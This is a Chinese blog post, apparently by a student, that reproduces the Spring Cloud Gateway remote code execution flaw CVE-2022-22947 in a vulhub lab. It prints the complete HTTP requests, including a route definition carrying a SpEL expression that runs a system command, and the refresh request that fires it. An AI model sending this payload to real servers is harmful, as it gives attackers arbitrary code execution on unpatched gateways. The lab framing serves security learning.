觅稀奇MeXiQi.COM

当前位置:
  1. 首页
  2. IIS
  3. 正文

vulhub系列CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现

访客 访客 2024-01-05 1073 0

vilhub靶场系列

文章目录

  • 一、环境搭建
  • 二、漏洞复现
  • 总结

所需环境:

  • Linux(kali)操作系统
  • vilhub靶场

一、环境搭建

  1. 进入目标目录:cd/桌面/vulhub-master/spring/CVE-2022-22947
  2. 在该目录执行命令:dockers-composeup-d
  3. 查看容器开启端口:dockerps
  4. 查看环境搭建是否成功:http://192.168.162.129:8080/actuator/gateway/routes/fuck

成功示例:

二、漏洞复现

访问http://192.168.162.129:8080/actuator/gateway/routes/fuck抓取数据包,将请求方式改为POST。

示例:

添加下列数据包:(包含恶意SpEL表达式的路由):

  • POST/actuator/gateway/routes/hacktestHTTP/1.1
  • Host:your-ip:8080
  • Accept-Encoding:gzip,deflate
  • Accept:*/*
  • Accept-Language:en
  • User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/97.0.4692.71Safari/537.36
  • Connection:close
  • Content-Type:application/json
  • Content-Length:310
  • {
  • "id":"hacktest",
  • "filters":[{
  • "name":"AddResponseHeader",
  • "args":{
  • "name":"Result",
  • "value":"#{newString(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(newString[]{\"id\"}).getInputStream()))}"
  • }
  • }],
  • "uri":"http://example.com"
  • }

    • 示例:

    应用刚刚添加的路由。(该数据包将触发SpEL表达式的执行)

  • POST/actuator/gateway/refreshHTTP/1.1
  • Host:your-ip:8080
  • Accept-Encoding:gzip,deflate
  • Accept:*/*
  • Accept-Language:en
  • User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/97.0.4692.71Safari/537.36
  • Connection:close
  • Content-Type:application/x-www-form-urlencoded
  • Content-Length:0

    • 示例:

    发送如下数据包即可查看执行结果:

  • GET/actuator/gateway/routes/hacktestHTTP/1.1
  • Host:your-ip:8080
  • Accept-Encoding:gzip,deflate
  • Accept:*/*
  • Accept-Language:en
  • User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/97.0.4692.71Safari/537.36
  • Connection:close
  • Content-Type:application/x-www-form-urlencoded
  • Content-Length:0

    • 示例:

    发送如下数据包清理现场,删除所添加的路由。

  • DELETE/actuator/gateway/routes/hacktestHTTP/1.1
  • Host:your-ip:8080
  • Accept-Encoding:gzip,deflate
  • Accept:*/*
  • Accept-Language:en
  • User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/97.0.4692.71Safari/537.36
  • Connection:close

    • 示例:

    再次刷新路由:

  • POST/actuator/gateway/refreshHTTP/1.1
  • Host:192.168.32.130:8080
  • Accept-Encoding:gzip,deflate
  • Accept:*/*
  • Accept-Language:en
  • User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/97.0.4692.71Safari/537.36
  • Connection:close
  • Content-Type:application/x-www-form-urlencoded
  • Content-Length:0

    • 示例:

    至此,复现结束。

    总结

    本人刚刚大二,对网络安全有浓厚兴趣,欢迎各位大佬多多指点,先谢谢各位大佬啦。。(求个关注谢谢各位大佬)

    如无特别说明,本站所有文章均为原创。转载请注明出处,谢谢合作。

    本文地址:https://www.mexiqi.com/132944.html

    分享本文
    微信扫一扫分享到朋友圈
    上一篇
    vue项目使用CDN引入
    下一篇
    Vue 2项目升级到Vue 3

    发表评论

    • 评论列表
    还没有人评论,快来抢沙发吧~